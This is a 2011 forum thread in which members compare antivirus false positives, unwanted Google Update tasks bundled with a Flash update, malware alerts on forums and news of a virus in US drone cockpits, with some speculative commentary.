Pegasus Research Consortium

Breaking News => Breaking News => Topic started by: zorgon on October 08, 2011, 12:02:23 am

Title: Internet Wars and Java Attacks
Post by: zorgon on October 08, 2011, 12:02:23 am
Internet Wars and Java Attacks

Yesterday before I had to take the whole forum off line, I had started a thread on the hacking and other issues. It was titled;

Microsoft and Google tricks - are they at War? (http://lucianarchy.proboards.com/index.cgi?board=zorgon&action=display&thread=10863&page=1)

It was the only thread that got messed up in the reset (only 24 hours this time) but fortunately I had copied it to open minds as well... so I brought it back along with the additions made by a few members over there. Since this concerns everyone... it should be posted at both sites...

Now before I continue... there is something I STRONGLY ADVISE all who read this right now to CLEAN YOUR JAVA HISTORY... you will see why later. Trust me on this and then read on.

We found that it does not clean using CC Cleaner or other cleaners automatically so you MUST do it manually

To do this...

1. Control Panel
2. JAVA
3. Temporary Internet Files
4. Settings
5. UNCHECK box "Keep Temporary Internet Files on my Computer
6. DELETE FILES
7. Delete the following temporary files?
8. check box Applications and Apelets
9. check box TRACE and log file
10. hit OK

You will see why this is important in the thread info. You can wait till you read it but these are temporary internet file that you do not need.


OH and remember the term "FALSE POSITIVES"

Title: Re: Internet Wars and Java Attacks
Post by: zorgon on October 08, 2011, 12:02:49 am
Oct 1, 2011, 10:54pm

Microsoft and Google tricks - are they at War?

Yesterday while using Firefox I had my computer shut itself down several times...WTF? Did all the virus, etc scans... then finally traced it to watching videos at youtube. Seems my protection program that shut down when there is an unknown attack were triggered.

Then over the past few weeks several forums and websites have experience odd problems. Open Minds was down for a day, yesterday I saw several messages from Proboards saying they were having unknown issues (brief but I got that screen three time). Then I saw ATS was also having issues. This is the main thread on the problem at ATS but there were several more. With the size of their membership base, they are more likely than anyone to find such problems

What the heck is going on with ATS (http://www.abovetopsecret.com/forum/thread759012/pg1)

As was pointed out in that thread by the owner....

Quote
People should be aware that something really weird is happening with Microsoft Security Products today. Earlier in the day it was flagging the Chrome browser as a virus and deleting it. Other complaints have been around some FireFox plug-ins also being flagged.

Here is the link;

Microsoft Security Products Flag Google Chrome As a Virus

Quote
"Reports poured in this morning that Microsoft's security products, namely Microsoft Security Essentials and Forefront Client Security, were flagging Google Chrome as a virus (PWS:Win32/Zbot) and removing the browser if users chose to clean and reboot their machines. Users reported that the only way to mitigate the problem was to set MSE and Forefront to 'always allow' Zbot, which is generally considered to be a bad idea."

Quote
A Google employee in the above support thread notes that Microsoft has now pushed another update to resolve the issue. "On September 30th, 2011, an incorrect detection for PWS:Win32/Zbot was identified. On September 30th, 2011, Microsoft released an update that addresses the issue. Signature versions 1.113.672.0 and higher include this update."

Microsoft Security Products Flag Google Chrome As a Virus (http://tech.slashdot.org/story/11/09/30/176230/microsoft-security-products-flag-google-chrome-as-a-virus)

Are all these recent issues related? May be too soon and hard to tell, but SOMETHING is going on and it bears making people aware of it and a close watch.

Quote
Google does a lot of very shady things involving auto-updates and integrating with unnecessary parts of a system. Why does my Firefox installation need a Google Update plug-in I never asked for, and why does it keep getting reactivated even though I've explicitly turned it off?

The reaction might not have been deliberate on this occasion, but I am utterly lacking in sympathy if Google's shady code starts getting treated like malware. If it walks like a duck and quacks like a duck, it's still a duck, even though sometimes it can taste good.

Microsoft Security Products Flag Google Chrome As a Virus (http://tech.slashdot.org/story/11/09/30/176230/microsoft-security-products-flag-google-chrome-as-a-virus)

Quote
Chrome is a virus. You see, it has caused the marketing people at Mozilla to go crazy with the numbering scheme of FF and as a result, borked up my once good to use user interface into a complete mess of new design, misplaced buttons, screwy single menus and a whole host of unusable extensions. Chrome is a virus... that has killed Firefox.

Microsoft Security Products Flag Google Chrome As a Virus (http://tech.slashdot.org/story/11/09/30/176230/microsoft-security-products-flag-google-chrome-as-a-virus)

This is one point I am already familiar with having just upgrades to Firefox 6.0.2 (and now already they are pushing 7.0) Buttons and features scattered around that I had to 'relearn' them once I found them. I was wondering why they would make such a drastic revision... seems we now have the answer

Google AdSense
the Good, the Bad, and the Downright Ugly


Several other forums have gone the route of adding direct connections to Twitter, Facebook and Google +1. Seems to me that since that has been done, all that happens is a flood of people that really add nothing to the quality of the forum posts, and mainly seem oriented to getting numbers.

Personally I think this number crunching, while it may be goor to generate revenue, just swamps a forum with trolls and other distractions. As such we will NOT add such connections here and there will be a note to that effect in the Rules and Structure section for review

Now about AdSense

Google currently offers webmasters a payment of $75.00 to sign up for the program. Once you do you start generation income based on people clicking on AdWords and other links...

I STRONGLY suggest reading the following information that I have taken some basic clips from. I have also written to the author to ask permission to repost this article.

Quote
AdSense: what is it?

AdWords is the system that produces the advertisements in Google's search results pages. The ads are contextual and match what is on each results page, and an advertiser doesn't pay anything unless a surfer clicks on the ad. AdWords became very popular with advertisers, and Google started to make money.

Then Google took AdWords a stage further, by allowing the ads to be displayed on other people's websites. This is AdSense. When the AdWords ads are displayed on other people's websites, such as this one, it is called AdSense. When visitors to the site click on an AdSense ad, the site owner is paid a large percentage of what the advertiser pays to Google for the click.

Google AdSense - by Phil Craven - Web Workshop (http://www.webworkshop.net/google-adsense-the-good-the-bad-and-the-ugly.html)

Quote
AdSense: the Good

AdSense allows website owners to earn money from their sites in a way that they couldn't do before. All they have to do is put the AdSense code in their pages, and some visitors to the site will click on the ads that are displayed.

Quote
Here endeth the "Good" side of AdSense. Google's creation is excellent, but in launching it, they inadvertantly created something of a monster that just keeps growing.

Some people soon realised that they could capitalise on AdSense in ways that would be detrimental to the Web, to Web users, and to search engines, including Google itself. A new off-white, and sometimes positively black, industry was born.

Google AdSense - by Phil Craven - Web Workshop (http://www.webworkshop.net/google-adsense-the-good-the-bad-and-the-ugly.html)

Quote
AdSense: the Bad

Shortly after AdSense appeared, MFA sites started to appear.These are sites that are created for the sole purpose of making money from AdSense. Some of them contain genuine information and are useful, but most of them contain nothing of real value to Web users. The non-useful ones usually contain nothing but links to other sites - the links themselves being more AdSense ads - although some of them contain some real content that has been stolen from other websites. They are parasite websites that help nobody but their owners.

Google AdSense - by Phil Craven - Web Workshop (http://www.webworkshop.net/google-adsense-the-good-the-bad-and-the-ugly.html)

Quote
AdSense: the Downright Ugly - AdSense scams

The MFA sites spoil the Web, but they don't scam people. They merely take advantage of AdSense. But there are also scammers who are taking adavantage of AdSense, by selling something that they know can't succeed. If it could succeed, they wouldn't be offering it to other people - they would be raking in the millions themselves. This AdSense Scams article describes them fully, so I'll just provide a brief summary.

There is a LOT more valuable info in the original article. PLEASE take the time to read it to avoid the scams

Related Links:

1. AdSense Ready WebSites Scams - why NOT to buy AdSense Ready Websites (http://www.webworkshop.net/adsense-ready-websites-scams.html)
2. Google AdSense Scam: Is there Truth to the Google AdSense Scam? (http://www.googleadsensescam.com/)
3. Google Adsense Scam - No Support / Explanation From Google Adsense (http://www.google.com/support/forum/p/AdSense/thread?tid=2ee2d3252cd81e68&hl=en) - Google Forums
4. Google AdSense - by Phil Craven - Web Workshop (http://www.webworkshop.net/google-adsense-the-good-the-bad-and-the-ugly.html)


This direct from Google Forums...

Quote
Appealing Google Adsense is waste of time and words, i would rather like to highlight to all publishers whose account were never disabled; BEWARE OF USING CLICK OPTIMIZER techniques.

I had sports news site that fetched more than 35000 visits on a day of important game and next day my site got banned. Why? No reason was provided. If site content was so spammy, Google News team never would have taken. This was excellent piece of content. I used "One Click Optimizer" technique published by Google Adsense : http://www.google.com/support/adsense/bin/static.py?page=guide.cs&guide=29872&topic=29875&answer=187666

Due to this i got 10000 clicks. And i got punished. I had only 3 units, no hidden keywords, no backdoor pages ... no fraud/invalid click. Still i have not received any reply from Google Adsense team. Only standard reply; our team believed it and we did it.

Later after a month; i got my account disabled and Google Adsense team blocked my more than 2000 USD. I keep asking Google Adsense team how do you believe that i have violated your policies but no reply.

I read a lot of articles on it and always be careful about Adsense team; but yet i am in their trap. I do not know if they really repay to advertisers; or really care for them.. if they care for advertiser; why should they publish article to train publisher to misbehave with advertisers... read their text carefully:

Place a 300x250 medium rectangle embedded into the content for placement targeting and better integration.

Put a 728x90 leaderboard or a 468x60 banner below the article to attract the users attention when they finish reading. ( to attract the users attention...... this publisher should cheat readers to attract attention by placing ad below content. )

Place a 160x600 wide skyscraper below the side navigation bar.
Add two 468x15 link units below the title, and between the article and the leaderboard (728x90) or banner (468x60). ( This is what most punishing... If you put below title; definitely you will mislead readers to click.  There is another article that says ; this is invalid. Ads shouldn't be placed under a title or section heading in a way that implies that the ads are not ads. Source : http://adsense.blogspot.com/2008/03/another-look-at-optimizations.html  ( What is real Dear Google Adsense Team?)
Adding an Adsense for Search search box next to the top navigation bar would be an additional way to monetize your site. ( to monetize your site ...see the word used. Your site purpose is not for readers, better content but to monetize. Google Adsense team is teaching to monetize site by such techniques and later they disable account. )
My only question is: if i do not send fraud click / invalid clicks by any automation; I do not use more than 3 units in same page; My article is not full of keywords - Why should i get punishment and loss 2000 USD? And why their team is not answering me that because of so & so reason in details; we are disabling your account.

They talk of "Valid Clicks" - they have extra ordinary software to track invalid clicks; they should repay me all money for valid clicks. And i am 100% sure on basis of my experience that I have all valid clicks. But Google never warn or teach to publisher.

Fact is their internal content  are conflicting. As i said :

http://adsense.blogspot.com/2008/03/another-look-at-optimizations.html

Vs

http://www.google.com/support/adsense/bin/static.py?page=guide.cs&guide=29872&topic=29875&answer=187666

Are in Conflict. Then who will punish Google Adsense team?  Small publishers are not big companies to file a case against them. Even this forum is not helping me. I sent 10 emails to Adsense team; but no reply, no help.

Google Adsense Team is self court and jury; they do not give reasons for disabling account. Just one line - "as our team found; we disable account and not paying you money." But give us chance to put our words in reply. At least one chance to correct ourselves?

Train us, Teach us. In last 5 years; Google Adsense team never warned me or trained me.

Hope you are now aware of Google Adsense Team Scam!!

Title: Re: Internet Wars and Java Attacks
Post by: zorgon on October 08, 2011, 12:04:56 am
author=burntheships  Oct 1, 2011, 10:58pm

I have noticed some very unusual things lately on my desktop,
laptop went out so....

Microsoft was blocking certain websites deeming them unsafe.

And what was the offending website? You Tube! At first I thought I
just had not payed attention to what I was doing...but...then once
I realized it did it again...whoa!

It was not my virus protection software, it was MS!

I have firefox on there also, did not try it, just was using an IE window
that was already open.

I don't even remember what I was attempting to watch on You Tube,
it was that run of the mill.

author = ProtoplasmicTraveller
I got a hard drive failure imminent message a couple weeks ago and had to replace my PC as a result when I was entirely unable to boot it up. I suspect Microsoft Security Essentials played a part in it all, and haven't installed/activated it on my new PC as a result.

Science Fiction and thriller writers often like to regale us with fictional stories of a future world ruled and dominated by one corporation.

I wouldn't be surprised if that corporation is Google or a company like it. The Internet and the World Wide Web in many ways are in fact a net, and a web that do pretty much have all of us and our most sensitive and personal information ensnared and caught up in it.

In a world where information is power that is frankly a lot of power, and with Google's recent acquisition of Motorola Cellular and it's android operating system it really is poised to not just challenge Microsoft but eventually perhaps emerge as a the world's most powerful and relevant corporation.

However as formidable as Google is Baidu it's Chinese counterpart is shaping up to be just as formidable and making many of the same moves Google is in the West in the East.

Companies like Google surely warrant watching because they are surely watching all of us.

AH!!! Microsoft Security Essentials came up several times on my Zone Alarm and I denied permission  I may have hit okay once or so that caused the shut down.

author=olddood Oct 2, 2011, 3:45am

Hmmm..I need to chat with my Forensic Computer Buddy about this stuff.
See what he knows.
He is quite brilliant about such things but, first to admit he does not know all...

@Zorgon...
What version of MS was this?  Win7? XP? Vista?  All?

I still use XP because I have been too lazy to reformat and install Win7...

author=tiderious Oct 2, 2011, 3:54am
Those guys are reaching farther and farther, to dig more and more information out of your computer. We are getting so used to updates, and little tweeks that we hardly pay any attention. and that is probably what they want.
Title: Re: Internet Wars and Java Attacks
Post by: zorgon on October 08, 2011, 12:05:17 am
author=calikid Oct 2, 2011, 7:49am
I recently had the misfortune of having drive by malware install itself onto one of my systems (Win7-64bit/IE9).
While "weeding it out", I found the malware had loaded triggers  into my "Task Scheduler" in an attempt to reinstall itself if removed.

Funny thing was, while in Task Scheduler dealing with the malware, I found multiple "GOOGLE" entries right at the top of the Scheduler list. 
Probably unrelated but still weird since I don't even use Chrome.
Not sure WHY Google was there, or what programs it was running, but I deleted them anyway.
Along with the malware...

author = olddood Oct 2, 2011
Speaking of Malware my forensic buddy was telling me about this newer version of Malware.
It writes it's self to the BIO's chip on a computer.
Talk about hard to get rid of.  ::)
You literally have to re-install your BIO's firmware I suppose to get rid of it.

I can't remember all the nerd jargon he was telling me but, it sounds nasty...
Title: Re: Internet Wars and Java Attacks
Post by: zorgon on October 08, 2011, 12:05:59 am
author=garuda Oct 2, 2011, 10:32am

Microsoft has its own, free, antivirus software, called 'Security Essentials'.

That's the one that removed Google Chrome 'by accident' because of a 'mistake' in the virus definitions. An updated database of virus definitions was released shortly afterwards... but in the mean time that damage had been done to loads of people.
Title: Re: Internet Wars and Java Attacks
Post by: zorgon on October 08, 2011, 12:07:35 am
author=calikid  Oct 2, 2011, 10:33am
Funny thing was, while in Task Scheduler dealing with the malware, I found multiple "GOOGLE" entries right at the top of the Scheduler list. 
Probably unrelated but still weird since I don't even use Chrome.
Not sure WHY Google was there, or what programs it was running, but I deleted them anyway.
Along with the malware...

Well now THAT is timely info.... because THIS occurred yesterday...

Quote
Okay more weirdness
I don't know if anyone else noticed this yet...

Adobe Flash plugin for Firefox required an update... so I downloaded it and ran it.

Without giving an option, Adobe software installed Google Chrome before it installed the new flash plugin on Firefox.

Google Chrome then at the same time added the Google Updater plugin back into Firefox  :o

I went to modzillaZine as it came up in a search on that plugin and on that page they have an ad for Google Chrome on a mozilla forum (at least that comes up for me)

http://forums.mozillazine.org/viewtopic.php?f=7&t=841905

Not much help there... the last post
"Actually you can get rid of it, the Google updater for Chrome, Earth and other Google stuff is always running (Processes), don't have a clue why they see fit to mess with FF."

and then the thread was closed.

So now I have to uninstall Chrome and the Google updater plugin... just because I needed the Adobe flash update. WTF is going on here? Anyone?

I tried to screen capture the screens, but after the install capture is not working (may just need a reboot) but I denied access for Chrome  which generated this message

This webpage is not available
The server at www.google.com can't be found, because the DNS lookup failed. DNS is the web service that translates a website's name to its Internet address. This error is most often caused by having no connection to the Internet or a misconfigured network. It can also be caused by an unresponsive DNS server or a firewall preventing Google Chrome from accessing the network.
Here are some suggestions:
Reload this web page later.
Check your Internet connection. Reboot any routers, modems, or other network devices you may be using.
Check your DNS settings. Contact your network administrator if you're not sure what this means.
Try disabling network prediction by following these steps: Go to Wrench menu > Options > Under the Hood and deselect "Predict network actions to improve page load performance." If this does not resolve the issue, we recommend selecting this option again for improved performance.
Try adding Google Chrome as a permitted program in your firewall or antivirus software's settings. If it is already a permitted program, try deleting it from the list of permitted programs and adding it again.
If you use a proxy server, check your proxy settings or check with your network administrator to make sure the proxy server is working.
If you don't believe you should be using a proxy server, try the following steps: Go to Wrench menu > Options > Under the Hood > Change proxy settings > LAN Settings and deselect "Use a proxy server for your LAN."
Error 105 (net::ERR_NAME_NOT_RESOLVED): Unable to resolve the server's DNS address.

:P

Okay so a reboot still no screen capture. It somehow disabled my hot keys but I was able to use the delay timer

Here is the modzilla forum with the Google Chrome ad...

(http://www.thelivingmoon.com/forum/temp/google_002.png)

Then when I uninstalled Google Chrome, IE came up trying to connect... I refused then got this...

(http://www.thelivingmoon.com/forum/temp/google_001.png)

Clicking the box to stop programs from 'suggesting' was disabled...  :o

So now I will have to do a full search and HiJack This scan to see what else they messed with...

All because of a simple update to the Adobe Flash plugin for Firefox.

I have used Firefox since day one, even before when it was Netscape. In fact I still used Netscape Composer to make my website pages. I am not happy with this turn of events. I posted that on the modzilla forum  shall see what comes of that.

I sure hope they haven't been compromised... THAT would suck big time..

So just now Google Installer is trying to get access... I see I have more nasty bugs in here to exterminate.


After cleaning out everything I found that Google Installer kept asking for permission. Couldn't figure out where it was hidden...

So now I will look at task scheduler... thanks
Title: Re: Internet Wars and Java Attacks
Post by: zorgon on October 08, 2011, 12:08:05 am
author=garuda board=zorgon thread=10863 post=320826 time=1317576736]
That's the one that removed Google Chrome 'by accident' because of a 'mistake' in the virus definitions. An updated database of virus definitions was released shortly afterwards... but in the mean time that damage had been done to loads of people.

Well maybe Google could 'accidentally' remove IE... then I would be rid of that virus :D
Title: Re: Internet Wars and Java Attacks
Post by: zorgon on October 08, 2011, 12:08:45 am
Quote from: garuda board=zorgon thread=10863 post=320826 time=1317576736
That's the one that removed Google Chrome 'by accident' because of a 'mistake' in the virus definitions. An updated database of virus definitions was released shortly afterwards... but in the mean time that damage had been done to loads of people.

Well maybe Google could 'accidentally' remove IE... then I would be rid of that virus :D
Title: Re: Internet Wars and Java Attacks
Post by: zorgon on October 08, 2011, 12:09:13 am
(http://www.thelivingmoon.com/forum/banners/Tex_01.gif)   Bigfatfurrytexan

October 02, 2011, 08:07:08 AM

I know it is a "security risk", but i never updated my firefox to FF4.  I liked the version I had, it is modified to just perfect for my taste.  And i noticed that FF4 was a resource hog, eating up over 334,000kb of memory on my moms laptop.  More recent versions are worse.

To be honest, except on this particular laptop, i tend towards Chrome.  It is lean and mean.  FF has become fat and bloated.  Of course, that may be an issue of worry, too.

I am to the point of not wanting to ever identify anything of myself to a computer that connects to the internet.  Data mining is insidious, and companies are allowed to plead ignorance in court and get away with it (or only get a light slap).

The Facebook thing recently happening is of a similar vein.  And I wonder what will really be done about it.  Guess it is lucky for them that they got that lobbying team put together finally.

Title: Re: Internet Wars and Java Attacks
Post by: zorgon on October 08, 2011, 12:09:42 am
(http://www.thelivingmoon.com/forum/index.php?action=dlattach;attach=23;type=avatar) ellirium113

Okay more weirdness

I don't know if anyone else noticed this yet...

Adobe Flash plugin for Firefox required an update... so I downloaded it and ran it.

Any one else having issues yet?

Guys I have seen this happen to a buddy of mine. I found in this case it seemed some sort of malware got through his anti-spyware program & his Norton Antivirus. It also turned off the settings to update themselves and effectively killed any ability to search on the web through internet explorer. So long as he typed in a web address it worked but any searches never worked.

You cna click the run box and type MSCONFIG (xp users) to manually shut down any offending program. I then installed Spybot S&D (IMO one of the best free anti spyware programs) after getting rid of his other one.

You can get spybot here:
http://www.safer-networking.org/en/spybotsd/index.html (http://www.safer-networking.org/en/spybotsd/index.html)

I installed this then updated it. Once you update this one you must manually click the immunize button to apply the new updates. The nice thing about this one is it has a registry locker that will warn you if anything tries to F#&K with your registry.  :)

After doing this none of the settings reverted back and everything was able to update antivisus definitions again etc.

Unfortunately I did not get time to see if it cured his search engine problem.  :(

This might be helpful:

http://www.ehow.com/how_5842581_remove-google-redirect-virus.html (http://www.ehow.com/how_5842581_remove-google-redirect-virus.html)


Title: Re: Internet Wars and Java Attacks
Post by: zorgon on October 08, 2011, 12:10:26 am
author=calikid
Funny thing was, while in Task Scheduler dealing with the malware, I found multiple "GOOGLE" entries right at the top of the Scheduler list.

Yup sure enough...

(http://www.thelivingmoon.com/forum/temp/google_003.png)

author=garuda
@zorgon: if you have a script blocker (like NoScript) running in Firefox, then that one would have blocked out the script that allowed you to install the flash update without installing Chrome...

In other words: if no script blocker running in FF, Adobe would have given you the option to install without installing Chrome. With script blocker, it installs both. Which stinks...

(I've had to install the update on 2 different machines, one with Noscript running in FF, and one without, so I could see the difference).


author=olddood
Speaking of Malware my forensic buddy was telling me about this newer version of Malware.
It writes it's self to the BIO's chip on a computer.
Talk about hard to get rid of.  ::)
You literally have to re-install your BIO's firmware I suppose to get rid of it.
I can't remember all the nerd jargon he was telling me but, it sounds nasty...

Well looking at those to Google Updates

Google Update Task Machine Core
Google Update Task Machine UA

I would say I have found your new version of malware  ??? :o
Title: Re: Internet Wars and Java Attacks
Post by: zorgon on October 08, 2011, 12:11:02 am
author=calikid  Oct 2, 2011, 10:35pm
You are welcome.   ;)

I also found a couple of Google Services Automatic Loads.
(gupdate and gupdateem).
You may want to check your Services and decide if you actually WANT them running.
Sure would be nice if they would ASK before installing and running services on our systems!

Quote from: calikid board=zorgon thread=10863 post=320877 time=1317620108
I also found a couple of Google Services Automatic Loads.
(gupdate and gupdateem).

Nope don't got those and its been quiet since I disabled those other two

Quote
Sure would be nice if they would ASK before installing and running services on our systems!

What we need is a lawyer who wants to make a name to take them to court on hacking charges. If we attempted to upload poop to their comps or the gov we would be on our way to Gitmo

Kinda like this...


Facebook sued over claims it tracks users' activity after they log off
October 02, 2011


Quote
FACEBOOK is being sued by a group of users over claims it tracks their online activity after they log off.

The claims were exposed by an Australian technology blogger, Nik Cubrilovic, who conducted tests that revealed that when users log out, the site does not delete tracking ''cookies'' but modifies them, keeping information that can identify users as they surf the internet.

The company has told users cookie files installed on their computers to track interactions with Facebook applications and websites are removed when they log off, according to a complaint in the US federal court in San Jose, California. Facebook admitted last week that the cookies track internet activity after users log off, according to the suit.

''This admission came only after an Australian technology blogger exposed Facebook's practice of monitoring members who have logged out, although he brought the problems to the defendant's attention a year ago,'' the complaint states.

Facebook sued over claims it tracks users' activity  (http://m.smh.com.au/technology/technology-news/facebook-sued-over-claims-it-tracks-users-activity-20111001-1l2qv.html)

But then... we always knew that right?

 ::)

author=garuda
In other words: if no script blocker running in FF, Adobe would have given you the option to install without installing Chrome.

Oops  to late I already wrote Adobe a nasty letter   :-[

Title: Re: Internet Wars and Java Attacks
Post by: zorgon on October 08, 2011, 12:11:20 am
author=nightmaredavid Oct 3, 2011, 1:03am
It wasn't just a Microsoft issue. Google pushed out a Chrome update because Chrome did have code that was triggering the false positive. So technicaly, it wasn't a 100% percent false detection by Microsoft Security Essentials.

LOL @ the IE being a virus comment. You have to admit it's a lot better than it used to be though.

Wait until IE 10 and Windows 8 come out. Anything that tries to run gets stopped by SmartScreen which will be system-wide instead of just an IE feature. Any Windows user here should download the Windows 8 Developer Preview from Microsoft and try it out. They're finally going into the right direction with Windows 8.

As for Facebook, I'll never touch that site again. Had one account only because I got tired of family and friends asking why I didn't have one then eventually got rid of it. Made another one and just got sick of seeing all the teenage drama that goes on between adults on that site. Not to mention that there's nothing secure at all about the place. Even Zuckerberg himself once admitted in an interview that he's gone into the accounts of random members and gone through their personal stuff. The kid has zero respect for privacy.
Title: Re: Internet Wars and Java Attacks
Post by: zorgon on October 08, 2011, 12:11:44 am
The following are two PM's to forum admin. I will leave out the name and which forum, but the message needs to be added here

Oct 6, 2011

Author = Zorgon...
Have you been getting any reports from members that they are getting alerts, a virus warning or redirect?


We have had several reports like that. One of the problems was that the Google analytic package we tried had one piece of iffy software that someone could use in a bad way. That set off a few alarm bells and we got rid of it immediately.

Second, someone was messing with us, possibly adding tracking types of malware which while not really doing any damage, does set off some peoples' antivirus. Unfortunately, any forum that gets to any size or influence becomes a target for this sort of thing...or much worse.

We have to be on the lookout for this stuff all the time. The worst of it is that we are always in reactive mode because there are not enough proactive defense measures. The better news is that the worst things they could do are fixable if massively inconvenient. Unfortunately, the little annoying things they do undermine member confidence, especially if they succeed in getting the members to think that is the forum administration that is messing with them or spying on them in some way, as recently happened.

Key point here is USERS thinking the issue is COMING FROM THE FORUM

The reality is usually the scripts are on the person's hard drive via their browser... We ran a full scan of every ad coming to the site when this was happening and found one that was screwing with content, we removed it from the rotation and all was well.

I don't know if it was this one or not, we had several issues all happening at once and only one of them was actually coming from an ad on our site.

The rest were a nasty little bit of malware that made the rounds from who knows where. Lots of people acquired it which made it look as though it was originating from our (and many other) site when it really wasn't. Happens lots.

Okay again the same point..
Users thinking its the forum that is sending the alerts... like virus warnings, false positives and redirects. The forum says its in the user browser

Hold that thought....
Title: Re: Internet Wars and Java Attacks
Post by: zorgon on October 08, 2011, 12:12:15 am
Okay so now the start of attacks on my forum

Oct 6, 2011, 2:35am

author=nightmaredavid
LOL @ the IE being a virus comment. You have to admit it's a lot better than it used to be though.

I will admit no such thing... I deleted it :P

It wasn't just a Microsoft issue. Google pushed out a Chrome update because Chrome did have code that was triggering the false positive. So technicaly, it wasn't a 100% percent false detection by Microsoft Security Essentials.

Well something is still going on ATS is getting virus alerts and we are getting false application alerts and redirects all day

(http://www.caesonline.com/wp-content/uploads/2011/08/Dobermann_Fotos_6.jpg)  RUSSO

I got this message today Here in PRC, also got the message few times in ATS some days ago.

"My anti-virus (Avast) reported malware when I opened a thread"

http://www.abovetopsecret.com/forum/thread760537/pg (http://www.abovetopsecret.com/forum/thread760537/pg)

(http://files.abovetopsecret.com/files/img/qt4e8bfab5.png)

By ZeroReady

I'm guessing this is just a false positive, but Avast has never reported malware on ATS before. I've been using it for a long time, and I've never seen this. What gives? Anyone else using Avast Anti-virus ever get this on ATS?

Response by TheLoneArcher

Funny you should say that. Our Corporate virus detector here in the office did exactly that last week, three times infact. As ours is installed as a part of a military defence contract, it could be over sensitive. However, three times in succession is a bit high.

If the MODs can throw any light on the matter?

BTS report:

(http://www.thelivingmoon.com/forum/temp/Burntheships_Attack.jpg)

Ellirium's report:

Quote
yes...I had the browser off completely making a coffee...came back and clicked my favorites link to here and instantly I got a notification from Norton about intrusion attempt. Yes I am using IE8 on XP-PRO.

Quote
I browsed around other sites and came back, shut off the browser and came back...can't make it repeat the problem...Norton might just be automatically be blocking it now.

Quote
yeah I can get on no problem.

(http://www.thelivingmoon.com/forum/temp/Attack_Eliirium.png)
Quote
98.126.133.139

ATS war thread:

What the heck is going on with ATS?

http://www.abovetopsecret.com/forum/thread759012/pg1#pid12460196[/quote]


(http://www.thelivingmoon.com/forum/banners/Somamech.jpg)  Somamech

Quote
have you seen an alert message when logging in?

Yeah I get every time I click a new link.  Just started happening today for me  ???

screen grab  (miss the snipping tool in win 7..still on xp here at work)

(http://www.thelivingmoon.com/forum/temp/Alert_Somamech_02.png)

As for Facebook, I'll never touch that site again. Had one account only because I got tired of family and friends asking why I didn't have one then eventually got rid of it. Made another one and just got sick of seeing all the teenage drama that goes on between adults on that site. Not to mention that there's nothing secure at all about the place. Even Zuckerberg himself once admitted in an interview that he's gone into the accounts of random members and gone through their personal stuff. The kid has zero respect for privacy.

Early on he was quoted as saying (regarding students who first signed up to use his early version of Facebook), "They are stupid enough to give me their personal information."
Title: Re: Internet Wars and Java Attacks
Post by: zorgon on October 08, 2011, 12:12:35 am
Computer Virus Hits U.S. Drone Fleet

(http://www.wired.com/images_blogs/dangerroom/2011/10/Predator-cockpit_s.jpg)

Quote
A computer virus has infected the cockpits of America’s Predator and Reaper drones, logging pilots’ every keystroke as they remotely fly missions over Afghanistan and other warzones.

The virus, first detected nearly two weeks ago by the military’s Host-Based Security System, has not prevented pilots at Creech Air Force Base in Nevada from flying their missions overseas. Nor have there been any confirmed incidents of classified information being lost or sent to an outside source. But the virus has resisted multiple efforts to remove it from Creech’s computers, network security specialists say. And the infection underscores the ongoing security risks in what has become the U.S. military’s most important weapons system.

“We keep wiping it off, and it keeps coming back,” says a source familiar with the network infection, one of three that told Danger Room about the virus. “We think it’s benign. But we just don’t know.”

http://www.wired.com/dangerroom/2011/10/virus-hits-drone-fleet/

 :o

So hackers are getting into Area 51's Swarm Control at Creech

THIS is a scary statement..

“We keep wiping it off, and it keeps coming back,” says a source familiar with the network infection, one of three that told Danger Room about the virus. “We think it’s benign. But we just don’t know.”

So the forums are all getting hit heavy with no one really knowing WHERE its coming from. And now today we get a report that the Military, at one of the most secret installations on the planet, with all the billions spent on equipment... have this as an answer

“We think it’s benign. But we just don’t know.”

 :o

Are you scared yet?

Remember last year?

Now remember last year?

October 26, 2010

Communication With 50 Nuke Missiles Dropped in ICBM Snafu

(http://www.wired.com/images_blogs/dangerroom/2010/04/keyturn-660x438.jpg)

Quote
The Air Force swears there was no panic. But for three-quarters of an hour Saturday morning, launch control officers at F.E. Warren Air Force Base in Wyoming couldn’t reliably communicate or monitor the status of 50 Minuteman III nuclear missiles. Gulp.

Backup security and communications systems, located elsewhere on the base, allowed the intercontinental ballistic missiles to be continually monitored. But the outage is considered serious enough that the very highest rungs on the chain of command — including the President — are being briefed on the incident today.

A single hardware failure appears to have been the root cause of the disruption, which snarled communications on the network that links the five launch control centers and 50 silos of the 319th Missile Squadron. Multiple error codes were reported, including “launch facility down.”

It was a “significant disruption of service,” an Air Force official familiar with the incident tells Danger Room. But not unprecedented: “Something similar happened before at other missile fields.”

A disruption of this magnitude, however, is considered an anomaly of anomalies.

“Over the course of 300 alerts — those are 24-hour shifts in the capsule — I saw this happen to three or four missiles, maybe,” says John Noonan, a former U.S. Air Force missile launch officer who first tweeted word of the issue. “This is 50 ICBMs dropping off at once. I never heard of anything like it.”

http://www.wired.com/dangerroom/2010/10/communications-dropped-to-50-nuke-missiles-in-icbm-snafu/

Okay so the Nukes are on the same grid?  :o We are DOOMED

So back to our little problems. I just needed to add this in to show that the big boys are having the same issues... and DON'T KNOW



Title: Re: Internet Wars and Java Attacks
Post by: zorgon on October 08, 2011, 01:50:06 am
(http://www.thelivingmoon.com/forum/index.php/action=dlattach;attach=18;type=avatar) ellirium113

October 07, 2011, 06:16:05 PM

Author = Zorgon
Well looking at those to Google Updates
Google Update Task Machine Core
Google Update Task Machine UA
I would say I have found your new version of malware

Check this out:

http://omaha.googlecode.com/svn/wiki/GoogleUpdateOnAScheduleOverview.html (http://omaha.googlecode.com/svn/wiki/GoogleUpdateOnAScheduleOverview.html)

(http://img705.imageshack.us/img705/4697/coreupdateworkercrashha.jpg)

This is supposed to uninstall itself when there is no Google products being used...Chrome, Google Earth, Toolbar etc.

Title: Re: Internet Wars and Java Attacks
Post by: zorgon on October 08, 2011, 01:52:10 am
Google Update Now a Scheduled Task, But Still Evil

(http://howto.wired.com/mediawiki/images/Cctv_improbulous.jpg)

By Scott Gilbertson

Quote
Google has released a slight revision of its Google Update software for Windows. The latest version eliminates the need for Update to run constantly in the background — one of several reasons we’ve previously labeled the software “evil” — but stops short of conforming to the best practices of software updating.

Instead of running constantly in the background, consuming resources and creating a potential security vulnerability, Google Update now runs as a scheduled task.

Google Update has also been changed to allow some control over when it runs. The default is for Update to check with Google’s servers once an hour, but if you dig into the Windows Task Scheduler you can change that interval and even disable it altogether. However, according the Google Open Source Blog, tinkering with the update interval might cause Google Update to revert to its always-on status.

